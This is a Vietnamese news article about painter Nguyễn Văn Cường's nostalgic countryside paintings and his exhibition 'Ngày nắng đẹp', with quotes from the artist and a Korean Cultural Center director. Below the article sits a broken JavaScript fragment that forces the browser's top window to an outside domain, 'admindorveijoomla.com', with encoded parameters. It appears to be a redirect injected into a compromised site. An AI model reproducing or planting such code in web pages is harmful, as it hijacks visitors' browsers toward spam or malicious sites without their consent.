Trang chủ » Tin tức » Mỹ thuật » Thương nhớ đồng quê trong tranh Nguyễn Văn Cường

Thương nhớ đồng quê trong tranh Nguyễn Văn Cường

Với nét vẽ mộc mạc, dung dị, tranh của họa sĩ Nguyễn Văn Cường luôn tạo cho người xem một cảm giác yên bình và gợi nhớ về làng quê nơi chôn rau cắt rốn.

Họa sĩ Nguyễn Văn Cường sinh năm 1962, anh tốt nghiệp Đại học Mỹ thuật Hà Nội năm 1989 và đã từng tham gia triển lãm nhóm, cá nhân tại nhiều nước như: Mỹ, Anh, Nhật Bản, Na Uy; đặc biệt, ông đã từng 2 lần tham dự triển lãm tại Hàn Quốc. Anh được đánh giá là họa sĩ tiêu biểu cho trường phái lãng mạn đồng quê của Việt Nam.  Trong các tác phẩm của anh, người xem luôn bắt gặp hình ảnh trâu bò, trẻ thơ, lò gạch, cánh đồng quê, con sông quê, lũy tre làng… Những khung cảnh ấy hiện lên một cách đầy lãng mạn và thơ mộng xen lẫn hoài niệm về kỷ niệm thủa niên thiếu, hay mong muốn thoát khỏi cuộc sống nơi phố phường chật hẹp của chính tác giả.
Trong cuộc triển lãm mới nhất của mình mang tên Ngày nắng đẹp, Nguyễn Văn Cường chia sẻ: “Ngày nắng đẹp hội tụ đủ các sắc thái tươi đẹp về một miền quê với làng quê, con trâu, lũy tre, vụ mùa… Đó là quê hương trong lòng tôi và hy vọng cũng sẽ là quê hương trong lòng khán giả xem tranh”.
Anh bảo: “Tôi sinh ra tại Hà Nội nhưng tuổi thơ của tôi gắn bó với làng quê sứ Đoài (Hà Tây cũ) nên từ chỗ thân thuộc mà thêm yêu cái dung dị của hồn quê Việt. Những hình ảnh trẻ chăn trâu, những chị những mẹ còng lưng cắt lúa trên cánh đồng bát ngát… tự nó đã là một bức họa tuyệt mỹ rồi. Tôi chỉ cần nhắm mắt lại, cầm cọ vẽ lên là mọi thứ như chạy trên khung vẽ rồi”.

Là người yêu thích dòng tranh của họa sĩ Nguyễn Văn Cường, ông Park Nark Jong, Giám đốc Trung tâm Văn hóa Hàn Quốc bày tỏ cảm xúc: “Triển lãm lần này được tổ chức nhân dịp 2 phòng tranh mới của Trung tâm Văn hóa Hàn Quốc chính thức mở cửa. Là người Hàn Quốc đang sống xa quê hương nhưng khi ngắm nhìn những tác phẩm của họa sĩ Nguyễn Văn Cường, tôi bất chợt tìm thấy đâu đó nhiều nét đẹp tương đồng của quê hương mình qua từng tác phẩm trong Ngày nắng đẹp”.


//Non-IE
}
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
*/
window.top.location = "http://admindorveijoomla.com/?fp=HTT3VXsJuNXwfjxEX9paMfVGoMuv56KoGhyVNLMu9m7KkGXF6qUYbcztro0TszVAHzkXV5Dz1VW5p%2FtIwTf6dg%3D%3D&prvtof=1VRlUUL6neWXRqXcLkzS%2FssaUdwQJe8xXtrooofS%2Fpw%3D&poru=W28A%2FsKw%2BIaxbl%2FRRi0KhEXgkCSnpGg70gbzB4evVrbs0S4KnZVBWlKSxTefpKMIKfTJCAZ9MRifZOL%2FcyWKoLF2sPm91UMkEDFYrDfPODc%3D&cifr=1&";

  • Bình luận đã được đóng.

    Scroll To Top